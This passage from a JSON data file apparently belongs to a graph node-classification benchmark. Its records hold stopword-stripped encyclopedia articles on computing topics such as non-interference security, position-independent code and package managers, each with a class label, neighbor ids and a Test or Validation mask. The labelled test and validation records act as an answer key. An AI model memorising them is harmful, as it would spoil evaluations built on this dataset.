    "text": "Non-interference_(security):non-interference security non-interference strict multilevel security policy model first described goguen meseguer 1982 amplified 1984 simple terms computer modeled machine inputs outputs inputs outputs classified either low low sensitivity highly classified high sensitive viewed uncleared individuals computer non-interference property sequence low inputs produce low outputs regardless high level inputs low uncleared user working machine respond exactly manner low outputs whether high cleared user working sensitive data low user able acquire information activities high user let formula_1 memory configuration let formula_2 formula_3 projection memory formula_1 low high parts respectively let formula_5 function compares low parts memory configurations i.e. formula_6 iff formula_7 let formula_8 execution program formula_9 starting memory configuration formula_1 terminating memory configuration formula_11 definition non-interference deterministic program formula_9 following formula_13 strict policy computer system covert channels may comply say bell–lapadula model comply non-interference reverse could true reasonable conditions system labelled files etc except classified information startup exceptions noted however non-interference shown stronger non-deducibility strictness comes price difficult make computer system property may one two commercially available products verified comply policy would essentially simple switches one-way information filters although could arranged provide useful behaviour computer time=0 high i.e. classified information within low users create high information subsequent time=0 so-called write-up allowed many computer security policies computer legally leak high information low user still said comply non-interference policy low user able learn anything high user activities learn high information created means actions high users von oheimb 2004 computer systems comply bell-lapadula model suffer problem since explicitly forbid read-up consequently computer system complies non-interference necessarily comply bell-lapadula model thus bell–lapadula model non-interference model incomparable bell-lapadula model stricter regarding read-up non-interference model stricter respect covert channels legitimate multilevel security activities treat individual data records e.g. personal details sensitive allow statistical functions data e.g. mean total number released widely achieved non-interference machine",
    "neighbors": [
      3616,
      4420,
      9061,
      3624,
      3924,
      10968,
      10170
    ],
    "mask": "Test"
  },
  {
    "node_id": 5061,
    "label": 1,
    "text": "Recursive_join:recursive join recursive join operation used relational databases also sometimes called fixed-point join compound operation involves repeating join operation typically accumulating records time repetition makes change results compared results previous iteration example database family relationships searched record person mother father fields recursive join would one way retrieve person known ancestors first person direct parents records would retrieved parents information would used retrieve grandparents records new records found example many real cases repetition involves single database table specifically recursive self-join recursive joins time-consuming unless optimized indexing addition extra key fields techniques recursive joins highly characteristic hierarchical data therefore become serious issue xml data xml operations determining whether one element contains another extremely common recursive join perhaps obvious way implement xml data stored relational database standard way define recursive joins standard way recursive common table expressions database management systems support recursive ctes include microsoft sql server oracle postgresql others",
    "neighbors": [
      10340,
      11030,
      10137,
      8539,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 5062,
    "label": 6,
    "text": "Romeo_file_system:romeo file system romeo extension iso 9660 file system optical media cd-roms developed adaptec allows use long filenames 128 characters however romeo backwards compatible iso 9660 discs authored using file system read windows 9x windows nt platforms thus allowing exchange files operating systems non-roman characters involved arabic japanese cyrillic example ü becomes ³",
    "neighbors": [
      5413,
      7720,
      1801,
      8075,
      6062,
      5231,
      7342,
      8110,
      188,
      8976,
      5816,
      5596
    ],
    "mask": "Test"
  },
  {
    "node_id": 5063,
    "label": 5,
    "text": "Gordano_Messaging_Suite:gordano messaging suite gms gms commercial mail groupware server developed gordano ltd runs windows linux solaris aix originally called ntmail first commercially available mail windows platform products rebranded gordano messaging suite august 2002 reflect support additional hardware platforms operating systems features gms include encrypted access using ssl anti-virus anti-spam protection over-the-air handheld synchronization web based webmail calendaring interfaces plugin microsoft outlook allowing microsoft exchange style functionality administration performed web browser using http native support full groupware features exists clients reviews version 15",
    "neighbors": [
      2208,
      471,
      2748,
      10248,
      76,
      6797,
      5230,
      7983,
      11500,
      499,
      5875,
      9909,
      823,
      412,
      4439,
      1399
    ],
    "mask": "Test"
  },
  {
    "node_id": 5064,
    "label": 9,
    "text": "Matt_Kaufmann:matt kaufmann matt kaufmann senior research scientist department computer sciences university texas austin united states recipient 2005 acm software system award along robert s. boyer j strother moore work boyer-moore theorem prover",
    "neighbors": [
      11488,
      11083,
      9492,
      4791
    ],
    "mask": "Test"
  },
  {
    "node_id": 5065,
    "label": 2,
    "text": "Position-independent_code:position-independent code computing position-independent code pic position-independent executable pie body machine code placed somewhere primary memory executes properly regardless absolute address pic commonly used shared libraries library code loaded location program address space overlap uses memory example shared libraries pic also used older computer systems lacking mmu operating system could keep applications away even within single address space mmu-less system position-independent code executed memory address without modification differs absolute code must loaded specific location function correctly load-time locatable ltl code linker program loader modifies program execution run particular memory location generating position-independent code often default behavior compilers may place restrictions use language features disallowing use absolute addresses position-independent code use relative addressing instructions refer directly specific memory addresses sometimes execute faster replacing equivalent relative-addressing instructions may result slightly slower execution although modern processors make difference practically negligible early computers ibm 701 april 29 1952 ibm system/360 april 7 1964 code position-dependent program built loaded run particular address multitasking operating system allowed multiple jobs run using separate programs time operations scheduled two concurrent jobs would run programs required load addresses example payroll program accounts receivable program built run address 32k could run time ibm dos/360 1966 ability relocate programs loading sometimes multiple versions program maintained built different load address special class programs called self-relocating programs coded relocate loading ibm os/360 1966 relocated executable programs loaded memory one copy program required loaded program could moved way comparison early segmented systems burroughs mcp burroughs b5000 1961 multics 1964 paging systems ibm tss/360 1967 base bounds systems gecos ge 625 exec univac 1107 code inherently position-independent since addresses program relative current segment rather absolute position-independent code developed eliminate restrictions non-segmented systems position-independent program could loaded address memory invention dynamic address translation function provided mmu originally reduced need position-independent code every process could independent address space range addresses however multiple simultaneous jobs using code created waste physical memory two jobs run entirely identical programs dynamic address translation provides solution allowing system simply map two different jobs address 32k bytes real memory containing single copy program different programs may share common code example payroll program accounts receivable program may contain identical sort subroutine shared module shared library form shared module gets loaded mapped two address spaces procedure calls inside shared library typically made small procedure linkage table stubs call definitive function notably allows shared library inherit certain function calls previously loaded libraries rather using versions data references position-independent code usually made indirectly global offset tables gots store addresses accessed global variables one got per compilation unit object module located fixed offset code although offset known library linked linker links modules create shared library merges gots sets final offsets code necessary adjust offsets loading shared library later position independent functions accessing global data start determining absolute address got given current program counter value often takes form fake function call order obtain return value stack x86 special register powerpc sparc mips probably least risc processors esa/390 stored predefined standard register processor architectures motorola 68000 motorola 6809 wdc 65c816 knuth mmix arm x86-64 allow referencing data offset program counter specifically targeted making position-independent code smaller less register demanding hence efficient dynamic-link libraries dlls microsoft windows use variant e8 call instruction call near relative displacement relative next instruction instructions need fixed dll loaded global variables e.g arrays string literals virtual function tables expected contain address object data section resp code section dynamic library therefore stored address global variable needs updated reflect address dll loaded dynamic loader calculates address referred global variable stores value global variable triggers copy-on-write memory page containing global variable pages code pages global variables contain pointers code global data remain shared processes operation needs done os load dynamic library arbitrary address windows vista later versions windows relocation dlls executables done kernel memory manager shares relocated binaries across multiple processes images always relocated preferred base addresses achieving address space layout randomization aslr versions windows prior vista require system dlls prelinked non-conflicting fixed addresses link time order avoid runtime relocation images runtime relocation older versions windows performed dll loader within context process resulting relocated portions image longer shared processes handing dlls windows differs earlier os/2 procedure derives os/2 presents third alternative attempts load dlls position-independent dedicated shared arena memory maps loaded users dll able use in-memory copy multics procedure conceptually code segment linkage segment code segment contains code linkage section serves template new linkage segment pointer register 4 pr4 points linkage segment procedure call procedure saves pr4 stack loading pointer callee linkage segment procedure call uses indirect pointer pair flag cause trap first call dynamic linkage mechanism add new procedure linkage segment known segment table kst construct new linkage segment put segment numbers caller linkage section reset flag indirect pointer pair ibm s/360 time sharing system tss/360 tss/370 procedure may read-only public csect writable private prototype section psect caller loads v-constant routine general register 15 gr15 copies r-constant routine psect 19th word save area pointed gr13 dynamic loader load program pages resolve address constants first page fault position-independent executables pie executable binaries made entirely position-independent code systems run pic executables reasons used pie binaries used security-focused linux distributions allow pax exec shield use address space layout randomization prevent attackers knowing existing executable code security attack using exploits rely knowing offset executable code binary return-to-libc attacks apple macos ios fully support pie executables versions 10.7 4.3 respectively warning issued non-pie ios executables submitted approval apple app store hard requirement yet non-pie applications rejected openbsd pie enabled default architectures since openbsd 5.3 released support pie statically linked binaries executables codice_1 codice_2 directories added near end 2014 beginning fedora 23 fedora maintainers decided build packages pie enabled default ubuntu 17.10 pie enabled default across architectures gentoo new profiles support pie default android enabled support pies jelly bean removed non-pie linker support lollipop",
    "neighbors": [
      1152,
      1922,
      8066,
      8966,
      6664,
      6921,
      9610,
      9739,
      9996,
      6797,
      10508,
      11153,
      4884,
      7702,
      7071,
      1952,
      6821,
      1702,
      7595,
      6829,
      9646,
      7471,
      2224,
      5040,
      7983,
      11188,
      823,
      5176,
      3386,
      1724,
      10176,
      9921,
      3010,
      1219,
      6596,
      7234,
      4424,
      4553,
      5065,
      1106,
      4562,
      5714,
      5598,
      8186,
      868,
      7269,
      8037,
      9829,
      5356,
      9964,
      1775,
      499,
      2804,
      6772,
      1399,
      634,
      8700,
      7421,
      9854
    ],
    "mask": "Test"
  },
  {
    "node_id": 5066,
    "label": 7,
    "text": "Apache_Drill:apache drill apache drill open-source software framework supports data-intensive distributed applications interactive analysis large-scale datasets drill open source version google dremel system available infrastructure service called google bigquery one explicitly stated design goal drill able scale 10,000 servers able process petabytes data trillions records seconds drill apache top-level project drill supports variety nosql databases file systems including alluxio hbase mongodb mapr-db hdfs mapr-fs amazon s3 azure blob storage google cloud storage swift nas local files single query join data multiple datastores example join user profile collection mongodb directory event logs hadoop drill datastore-aware optimizer automatically restructures query plan leverage datastore internal processing capabilities addition drill supports data locality drill datastore nodes apache drill 1.9 added dynamic user defined functions apache drill 1.11 added cryptographic-related functions pcap file format support drill primarily focused non-relational datastores including apache hadoop text files nosql cloud storage following datastores supported new datastore added developing storage plugin drill schema-free json data model enables query non-relational datastores in-situ papers influenced birth design partial list",
    "neighbors": [
      10377,
      11323,
      8460,
      1935,
      1296,
      6161,
      7567,
      1047,
      8217,
      11161,
      6555,
      8860,
      3877,
      10661,
      11303,
      1327,
      7983,
      4919,
      5047,
      4538,
      1851,
      6074,
      6458,
      7485,
      7742,
      9789,
      7233,
      6338,
      4419,
      11201,
      3269,
      1222,
      1991,
      4294,
      6345,
      7750,
      8139,
      4429,
      4944,
      1363,
      8408,
      9179,
      7261,
      990,
      8799,
      10719,
      865,
      4194,
      11235,
      8294,
      11111,
      8425,
      8810,
      747,
      5612,
      2163,
      6774,
      7159,
      1913,
      1018
    ],
    "mask": "Test"
  },
  {
    "node_id": 5067,
    "label": 2,
    "text": "Package_manager:package manager package manager package-management system collection software tools automates process installing upgrading configuring removing computer programs computer operating system consistent manner package manager deals packages distributions software data archive files packages contain metadata software name description purpose version number vendor checksum list dependencies necessary software run properly upon installation metadata stored local package database package managers typically maintain database software dependencies version information prevent software mismatches missing prerequisites work closely software repositories binary repository managers app stores package managers designed eliminate need manual installs updates particularly useful large enterprises whose operating systems based linux unix-like systems typically consisting hundreds even tens thousands distinct software packages software package archive file containing computer program well necessary metadata deployment computer program source code compiled built first package metadata include package description package version dependencies packages need installed beforehand package managers charged task finding installing maintaining uninstalling software packages upon user command typical functions package management system include computer systems rely dynamic library linking instead static library linking share executable libraries machine instructions across packages applications systems complex relationships different packages requiring different versions libraries results challenge colloquially known dependency hell microsoft windows systems also called dll hell working dynamically linked libraries good package management vital systems framework system openstep attempt solving issue allowing multiple versions libraries installed simultaneously software packages specify version linked system administrators may install maintain software using tools package management software example local administrator may download unpackaged source code compile install may cause state local system fall synchronization state package manager database local administrator required take additional measures manually managing dependencies integrating changes package manager tools available ensure locally compiled packages integrated package management distributions based .deb .rpm files well slackware linux checkinstall recipe-based systems gentoo linux hybrid systems arch linux possible write recipe first ensures package fits local package database particularly troublesome software upgrades upgrades configuration files since package managers least unix systems originated extensions file archiving utilities usually either overwrite retain configuration files rather applying rules exceptions usually apply kernel configuration broken render computer unusable restart problems caused format configuration files changes instance old configuration file explicitly disable new options disabled package managers debian dpkg allow configuration installation situations desirable install packages default configuration overwrite configuration instance headless installations large number computers kind pre-configured installation also supported dpkg give users control kinds software allowing installed system sometimes due legal convenience reasons distributors side software often downloaded number software repositories user interacts package management software bring upgrade customary present user list actions executed usually list packages upgraded possibly giving old new version numbers allow user either accept upgrade bulk select individual packages upgrades many package managers configured never upgrade certain packages upgrade critical vulnerabilities instabilities found previous version defined packager software process sometimes called version pinning instance advanced package management features offer cascading package removal packages depend target package packages target package depends also removed although commands specific every particular package manager large extent translatable package managers offer similar functions arch linux pacman/rosetta wiki offers extensive overview package managers like dpkg existed early 1994 linux distributions oriented binary packages rely heavily package management systems primary means managing maintaining software mobile operating systems android linux-based ios unix-like windows phone rely almost exclusively respective vendors app stores thus use dedicated package management systems package manager often called install manager lead confusion package managers installers differences include software configuration management systems treat building software deploying software separate independent steps build automation utility typically takes human-readable source code files already computer automates process converting binary executable package computer later package manager typically running computer downloads pre-built binary executable packages internet installs however kinds tools many commonalities example dependency graph topological sorting used package manager handle dependencies binary components also used build manager handle dependency source components example many makefiles support building executables also installing codice_1 example every package manager portage sorcery homebrew etc supports converting human-readable source code binary executables installing tools maak a-a-p designed handle building deployment used either build automation utility package manager also known binary repository manager software tool designed optimize download storage binary files artifacts packages used produced software development process package managers aim standardize way enterprises treat package types give users ability apply security compliance metrics across artifact types universal package managers referred center devops toolchain common universal package managers sonatype nexus repository manager jfrog artifactory inedo proget package manager relies format metadata packages manage package managers need groups files bundled specific package manager along appropriate metadata dependencies often core set utilities manages basic installation packages multiple package managers use utilities provide additional functionality example yum relies rpm backend yum extends functionality backend adding features simple configuration maintaining network systems another example synaptic package manager provides graphical user interface using advanced packaging tool apt library turn relies dpkg core functionality alien program converts different linux package formats supporting conversion linux standard base lsb compliant .rpm packages .deb stampede .slp solaris .pkg slackware .tgz .txz .tbz .tlz packages mobile operating systems google play consumes android application package apk package format windows store uses appx xap formats google play windows store eponymous package managers nature free open source software packages similar compatible licenses available use number operating systems packages combined distributed using configurable internally complex packaging systems handle many permutations software manage version-specific dependencies conflicts packaging systems free open source software also released free open source software one typical difference package management proprietary operating systems mac os x windows free open source software linux free open source software systems permit third-party packages also installed upgraded mechanism whereas package managers mac os x windows upgrade software provided apple microsoft respectively exception third party drivers windows ability continuously upgrade third party software typically added adding url corresponding repository package management configuration file beside system-level application managers add-on package managers operating systems limited capabilities programming languages developers need latest libraries contrast system-level package managers application-level package managers focus small part software system typically reside within directory tree maintained system-level package manager however might case package managers deal programming libraries leading possible conflict package managers may claim file might break upgrades ian murdock commented package management single biggest advancement linux brought industry blurs boundaries operating system applications makes easier push new innovations ... marketplace ... evolve os",
    "neighbors": [
      2050,
      6154,
      6158,
      8209,
      8213,
      10270,
      2095,
      4150,
      8248,
      59,
      8262,
      4174,
      6227,
      2134,
      89,
      4192,
      8289,
      6244,
      6257,
      2168,
      8319,
      10368,
      2178,
      8326,
      10382,
      2195,
      10394,
      8347,
      6301,
      4279,
      6333,
      190,
      10433,
      2245,
      4302,
      6352,
      2259,
      10451,
      4309,
      6361,
      8413,
      10464,
      228,
      231,
      2281,
      6393,
      2310,
      4360,
      2321,
      8476,
      8491,
      6445,
      6446,
      2380,
      339,
      4437,
      6491,
      2401,
      8554,
      6508,
      2417,
      8582,
      4493,
      2448,
      2477,
      438,
      439,
      6583,
      8631,
      10687,
      8644,
      457,
      463,
      4561,
      482,
      8676,
      485,
      10732,
      8687,
      10739,
      10744,
      2560,
      10760,
      6680,
      10780,
      4637,
      561,
      6718,
      4673,
      10817,
      8772,
      2658,
      2666,
      6763,
      10860,
      2671,
      637,
      4737,
      8837,
      6797,
      657,
      10900,
      673,
      4775,
      4777,
      6828,
      2738,
      6837,
      10933,
      4803,
      2763,
      8907,
      10973,
      741,
      4841,
      6890,
      8940,
      10991,
      6898,
      2804,
      6910,
      788,
      6934,
      4887,
      8992,
      11045,
      815,
      823,
      2872,
      4920,
      6968,
      11079,
      4948,
      2901,
      4951,
      11095,
      863,
      2914,
      9063,
      9064,
      7020,
      7022,
      4978,
      7027,
      9074,
      2955,
      11155,
      9121,
      935,
      11184,
      950,
      9151,
      5070,
      975,
      9166,
      11232,
      7140,
      9190,
      5096,
      9194,
      9195,
      5101,
      3068,
      3079,
      5130,
      7181,
      3089,
      5138,
      5139,
      9237,
      9245,
      5155,
      9253,
      9257,
      11305,
      9262,
      9266,
      1080,
      3129,
      3131,
      1089,
      3152,
      7249,
      1107,
      1110,
      3162,
      11363,
      1126,
      9324,
      1138,
      11388,
      7293,
      9342,
      11391,
      7300,
      9353,
      11410,
      7341,
      1203,
      9407,
      5324,
      5335,
      3289,
      5343,
      1255,
      9461,
      7420,
      11525,
      7435,
      9487,
      5397,
      1304,
      5406,
      5410,
      9508,
      5430,
      11584,
      3395,
      9560,
      9561,
      9562,
      5467,
      9564,
      3422,
      1379,
      3438,
      7534,
      1394,
      11635,
      1396,
      1406,
      3458,
      7555,
      3462,
      11654,
      3465,
      3477,
      1431,
      1442,
      9637,
      1455,
      1456,
      9660,
      1470,
      9671,
      5578,
      9689,
      9693,
      9696,
      1506,
      5603,
      5612,
      5613,
      1522,
      1524,
      3573,
      5620,
      9726,
      7689,
      5644,
      1555,
      3618,
      1574,
      5670,
      3626,
      7722,
      9771,
      5677,
      1584,
      3649,
      3654,
      3667,
      3684,
      3685,
      5742,
      7812,
      9882,
      1694,
      1698,
      1700,
      5800,
      7854,
      9907,
      1718,
      5819,
      7871,
      7875,
      9931,
      3802,
      1761,
      3815,
      7920,
      7938,
      1802,
      7947,
      1813,
      1814,
      3865,
      5923,
      1833,
      7983,
      1842,
      5952,
      3911,
      3918,
      10062,
      10063,
      10080,
      3940,
      10091,
      10096,
      8068,
      10127,
      10138,
      6049,
      10149,
      6055,
      4010,
      8119,
      10172,
      4039,
      4040,
      2001,
      8147,
      10197,
      4056,
      2010,
      2021,
      6119,
      2036
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5068,
    "label": 3,
    "text": "Diamond_Mine_(video_game):diamond mine video game diamond mine video game first published mrm software acorn electron bbc micro home computers 1984 reissued blue ribbon 1985 ported systems 1985 1986 blue ribbon also released sequel diamond mine ii time games similar 1982 arcade game anteater maze design limited pipe length non-stop movement make first game original diamond mine ii could considered anteater clone aim game guide pipe maze-like mine collect diamonds avoiding hitting walls patrolling monsters player set length pipe level pipe started moving stop retracted section pipe lost pipe hit monster hits wall twice amount pipe lost diamonds placed sporadically maze way kill monsters sequel similar fundamental changes game play pipe pause retracted time without penalty walls hit monsters killed touching end pipe move pipe retracted maze also populated regular diamonds resemble dots pac-man maze",
    "neighbors": [
      9006,
      3039
    ],
    "mask": "Test"
  },
  {
    "node_id": 5069,
    "label": 4,
    "text": "Dr._Web:dr web dr.web software suite developed russian anti-malware company doctor web first released 1992 became first anti-virus service russia company also offers anti-spam solutions used yandex scan e-mail attachments also features add-on major browsers checks links online version dr web dr.web withdrawn av tests virus bulletin vb100 around 2008 stating believe virus scans viruses different subject real world malware attacks staunch anti-adware policy led software developers complaints dr web treated virus free applications virus receive responds dr web try contact dr web resolve issue dr.web discovered trojan backdoor.flashback variant affected 600,000 macs dr.web discovered trojan.skimer.18 trojan works like atm software skimmer trojan intercept transmit bank card information processed atms well data stored card pin code dr.web discovered ransomware linux.encoder.1 affected 2,000 linux users linux.encoder.2 discovered later turned earlier version ransomware doctor web received threat supposedly trojan writers criminal organization sponsoring malware development promotion march 31 two arson attacks carried igor daniloff anti-virus laboratory st. petersburg company received second threat doctor web released statement company considers duty provide users ultimate protection encroachments cybercriminals consequently efforts aimed identifying studying atm threats atm shield",
    "neighbors": [
      2049,
      7809,
      131,
      5891,
      1925,
      1417,
      3981,
      3342,
      6797,
      10637,
      4374,
      1052,
      156,
      6431,
      2208,
      2721,
      5924,
      2213,
      550,
      1318,
      6823,
      2601,
      8614,
      2859,
      3243,
      4013,
      6699,
      7983,
      8615,
      6834,
      4403,
      9523,
      10166,
      823,
      7103,
      704,
      9537,
      7362,
      3395,
      10308,
      4421,
      202,
      1355,
      1994,
      10574,
      10708,
      2005,
      8024,
      11225,
      1242,
      2907,
      8668,
      2654,
      9055,
      9569,
      11622,
      6382,
      4464,
      9713,
      3955,
      6643,
      10872,
      9341,
      127
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5070,
    "label": 2,
    "text": "ProGet:proget proget package management system designed inedo software company allows users host manage personal enterprise-wide packages applications components originally designed private nuget package manager microsoft development platform manager symbol source server enterprises utilize proget “ package applications components ” aim ensuring software built deployed consistently across environments gartner lists proget tool aligned “ preprod ” section devops toolchain used “ hold/stage software ready release ” proget currently supports growing list package managers including nuget chocolatey bower npm maven powershell rubygems helm debian python visual studio extensions .vsix proget also supports docker containers jenkins build artifacts plugin vulnerability scanning possible monitor feeds proget interface features also available managed number clients interfaces proget main features include originally proget designed run microsoft windows beginning version 4.4 also run linux via docker proget used asos.com cellenza abanca webmd health services sitecore infragistics among others",
    "neighbors": [
      8068,
      6797,
      1935,
      9487,
      788,
      1813,
      8213,
      10900,
      8476,
      9121,
      4775,
      6828,
      7983,
      823,
      5819,
      190,
      11201,
      9671,
      5578,
      5067,
      3918,
      463,
      3667,
      6361,
      2010,
      2910,
      2401,
      1379,
      741,
      231,
      6119,
      9063,
      7293
    ],
    "mask": "Test"
  },
  {
    "node_id": 5071,
    "label": 5,
    "text": "Acknowledgement_(data_networks):acknowledgement data networks data networking telecommunications computer buses acknowledgement ack signal passed communicating processes computers devices signify acknowledgement receipt message part communications protocol negative-acknowledgement nak nack signal sent reject previously received message indicate kind error acknowledgements negative acknowledgements inform sender receiver state adjust state accordingly oftentimes data messages telecommunications contain checksums verify integrity payload header checksums work way single bit data corrupted checksum would different value provide inexpensive way check probable signal integrity message received invalid checksum data received would different checksum message receiver know information corrupted often checksums employed corrupted message received either served ack signal served nak signal ascii code used communicate computer terminals terminal send enquiry character request condition receiver character respond ack 0000110 6 indicate operating normally nak 0010101 15 indicate error condition unicode provides visible symbols characters u+2406 ␆ u+2415 ␕ many protocols acknowledgement-based meaning positively acknowledge receipt messages internet transmission control protocol tcp example acknowledgement-based protocol computers communicate via tcp received packets acknowledged sending back packet ack bit set tcp protocol allows acknowledgements included data sent opposite direction protocols send single acknowledgement per packet information protocols tcp zmodem allow many packets transmitted receiving acknowledgement procedure necessary fill high bandwidth-delay product links large number bytes flight protocols nak-based meaning respond messages problem examples include reliable multicast protocols send nak receiver detects missing packets still protocols make use naks acks binary synchronous communications bisync adaptive link rate energy-efficient ethernet examples still protocols rc-5 user datagram protocol udp x10 protocols perform blind transmission acknowledgement often transmitting message multiple times hopes least one copy message gets acknowledgement function used automatic repeat request arq function acknowledgement frames numbered coordination frames received sent transmitter allows transmitter avoid overflow underrun receiver become aware missed frames binary synchronous communications nak used indicate transmission error detected previously received block receiver ready accept retransmission block bisync use single ack character two control sequences alternate even/odd block acknowledgement computer buses dedicated acknowledge wire control bus used acknowledge bus operations dack used isa dma datack used stebus data transfer acknowledge pin motorola 68000 inspired title dtack grounded etc computer buses always acknowledge every write writes use posted write i²c serial bus time slot acknowledgment bit byte",
    "neighbors": [
      1154,
      7188,
      11413,
      2203,
      10924,
      1197,
      7855,
      562,
      4918,
      5439,
      2752,
      1474,
      4423,
      3273,
      8138,
      2640,
      7269,
      7017,
      755,
      4725,
      1405
    ],
    "mask": "Test"
  },
  {
    "node_id": 5072,
    "label": 5,
    "text": "Twitterrific:twitterrific twitterrific mac os x ios client social networking site twitter created iconfactory first twitter desktop client come mac os x lets users view tweets micro-blog posts twitter website real time well publish twitterrific closed source software program main window uses translucent black theme similar certain palettes used aperture iphoto apple inc. software users may choose view full public timeline friends feed users also click links view poster profile mark tweet favorite twitterrific also provides functionality upload images videos posting twitter version 2.1 twitterrific supports growl notifications enhanced applescript capabilities used sites services use twitter api version 3 changed twitterrific advertising supported shareware every hour ad refreshed top list users buy program receive ads changes version 3 mostly added compatibility mac os x 10.5 incorporated newer twitter features like direct messaging ios version twitterrific 2008 apple design award best iphone social networking application april 1 2010 iconfactory released twitterrific ipad version 1.0 ready ipad us launch april 3 june 24 version twitterrific launched version 3.0 universally compatible iphone ipod touch ipad february 14 2017 kickstarter project launched iconfactory try revive twitterrific mac application october 10 2017 mac application received 5.0 update added mac app store",
    "neighbors": [
      576,
      1346,
      9922,
      9732,
      1960,
      10602,
      6539,
      9964,
      10059,
      7983,
      499,
      8700,
      3485,
      7359
    ],
    "mask": "Test"
  },
  {
    "node_id": 5073,
    "label": 3,
    "text": "Sandy_Bridge:sandy bridge sandy bridge codename microarchitecture used second generation intel core processors core i7 i5 i3 sandy bridge microarchitecture successor nehalem microarchitecture intel demonstrated sandy bridge processor 2009 released first products based architecture january 2011 core brand sandy bridge manufactured 32 nanometer process intel subsequent generation ivy bridge announced 2011 uses 22 nanometer die shrink known tick–tock model core i7 2600 sandy bridge cpu 3.4 ghz 1333 mhz ddr3 memory reaches 83 gflops performance whetstone benchmark 118,000 mips dhrystone benchmark last intel microarchitecture windows vista driver support officially exists intel demonstrated sandy bridge processor a1 stepping 2 ghz intel developer forum september 2009 upgraded features nehalem include sandy bridge processors one two four cores report cpuid model 0206a7h closely related stepping number seen cpuid pci configuration space later sandy bridge-e processors eight cores graphics using cpuids 0206d6h 0206d7h ivy bridge cpus cpuid 0306a9h date built four different configurations differing number cores l3 cache gpu execution units processors featuring intel hd 3000 graphics set bold processors feature hd 2000 graphics hd graphics pentium celeron models graphics core graphics clock rate indicated n/a suffixes denote note 3970x 3960x 3930k 3820 actually sandy bridge-e edition suffixes denote 31 january 2011 intel issued recall 67-series motherboards due flaw cougar point chipset hardware problem exists chipset sata ii ports may fail time causing failure connection sata devices though data risk intel claims problem affect 5 users 3 years however heavier i/o workloads exacerbate problem intel stopped production flawed b2 stepping chipsets began producing b3 stepping chipsets silicon fix shipping new chipsets started 14 february 2011 intel estimated full recovery volume april 2011 motherboard manufacturers asus gigabyte technology computer manufacturers dell hewlett-packard stopped selling products involved flawed chipset offered support affected customers options ranged swapping b3 motherboards product refunds sandy bridge processor sales temporarily hold one use cpu without motherboard however processor release dates affected two weeks intel continued shipping chipsets manufacturers agree set terms prevent customers encountering bug motherboard manufacturer websites instruction identify chipset stepping version using bios lshw produces partial output output says 'version 05 intel 6 series chipset intel c200 series chipset specification update google intel h61 revision 05 result 1 'pch device revision identification page 13 says '05h located 'b3 rev id 'b3 chipset stepping version suffix h means hexadecimal '05h means 5 sandy bridge intel tied speed every bus usb sata pci pci-e cpu cores uncore memory etc single internal clock generator issuing basic base clock bclk cpus multiplier locked way overclock increase bclk raised 5–7 without hardware components failing work around intel made available k/x-series processors feature unlocked multipliers multiplier cap 57 sandy bridge sandy bridge e platform alternative method known bclk ratio overclock idf intel developer forum 2010 intel demonstrated unknown sandy bridge cpu running stably overclocked 4.9 ghz air cooling non-k edition cpus overclock four bins turbo multiplier refer chipset support sandy ivy bridge processors vpro capability security features remotely disable pc erase information hard drives useful case lost stolen pc commands received 3g signals ethernet internet connections aes encryption acceleration available useful video conferencing voip applications sandy ivy bridge processors contain drm technology video streaming web sites rely restrict use content web sites offer 1080p streaming users cpus downgrade quality users introduction sandy bridge microarchitecture intel also introduced intel data plane development kit intel dpdk help developers communications applications take advantage platform packet processing applications network processors intel demonstrated haswell architecture september 2011 released 2013 successor sandy bridge ivy bridge",
    "neighbors": [
      3586,
      4108,
      9741,
      5649,
      8231,
      2088,
      2638,
      597,
      1119,
      7783,
      4204,
      8820,
      2165,
      4217,
      8325,
      7313,
      8851,
      6804,
      8855,
      1178,
      9391,
      4276,
      2237,
      5309,
      6339,
      8394,
      5844,
      6868,
      9945,
      10971,
      5356,
      5871,
      1776,
      3317,
      5883,
      5380,
      5384,
      5386,
      6926,
      4886,
      3352,
      2350,
      10548,
      823,
      6463,
      833,
      5444,
      9541,
      8035,
      9582,
      1400,
      5503,
      3457,
      3459,
      3973,
      9095,
      9611,
      8590,
      5523,
      9111,
      8090,
      10669,
      10675,
      1461,
      8125,
      8126,
      1998,
      977,
      2516,
      10715,
      7134,
      5606,
      1000,
      7657,
      1515,
      8684,
      10734,
      6639,
      499,
      4603
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5074,
    "label": 2,
    "text": "Region-based_memory_management:region-based memory management computer science region-based memory management type memory management allocated object assigned region region also called zone arena area memory context collection allocated objects efficiently deallocated like stack allocation regions facilitate allocation deallocation memory low overhead flexible allowing objects live longer stack frame allocated typical implementations objects region allocated single contiguous range memory addresses similarly stack frames typically allocated simple example consider following c code allocates deallocates linked list data structure region *r createregion listnode *head null int 1 1000 i++ // ... // use list destroyregion r although required many operations construct linked list destroyed quickly single operation destroying region nodes allocated need traverse list simple explicit regions straightforward implement following description based hanson region implemented linked list large blocks memory block large enough serve many allocations current block maintains pointer next free position block block filled new one allocated added list region deallocated next-free-position pointer reset beginning first block list blocks reused next region created alternatively region deallocated list blocks appended global freelist regions may later allocate new blocks simple scheme possible deallocate individual objects regions overall cost per allocated byte scheme low almost allocations involve comparison update next-free-position pointer deallocating region constant-time operation done rarely unlike typical garbage collection systems need tag data type basic concept regions old first appearing early 1967 douglas t. ross aed free storage package memory partitioned hierarchy zones zone allocator zone could freed all-at-once making zones usable regions 1976 pl/i standard included area data type 1990 hanson demonstrated explicit regions c called arenas could achieve time performance per allocated byte superior even fastest-known heap allocation mechanism explicit regions instrumental design number early c-based software projects including apache http server calls pools postgresql database management system calls memory contexts like traditional heap allocation schemes provide memory safety possible programmer access region deallocated dangling pointer forget deallocate region causing memory leak 1988 researchers began investigating use regions safe memory allocation introducing concept region inference creation deallocation regions well assignment individual static allocation expressions particular regions inserted compiler compile-time compiler able way guarantee dangling pointers leaks occur early work ruggieri murtagh region created beginning function deallocated end use data flow analysis determine lifetime static allocation expression assign youngest region contains entire lifetime 1994 work generalized seminal work tofte talpin support type polymorphism higher-order functions standard ml functional programming language using different algorithm based type inference theoretical concepts polymorphic region types region calculus work introduced extension lambda calculus including regions adding two constructs due syntactic structure regions nested meaning r created r must also deallocated r result stack regions moreover regions must deallocated function created restrictions relaxed aiken et al extended lambda calculus intended serve provably memory-safe intermediate representation compiling standard ml programs machine code building translator would produce good results large programs faced number practical limitations resolved new analyses including dealing recursive calls tail recursive calls eliminating regions contained single value work completed 1995 integrated ml kit version ml based region allocation place garbage collection permitted direct comparison two medium-sized test programs yielding widely varying 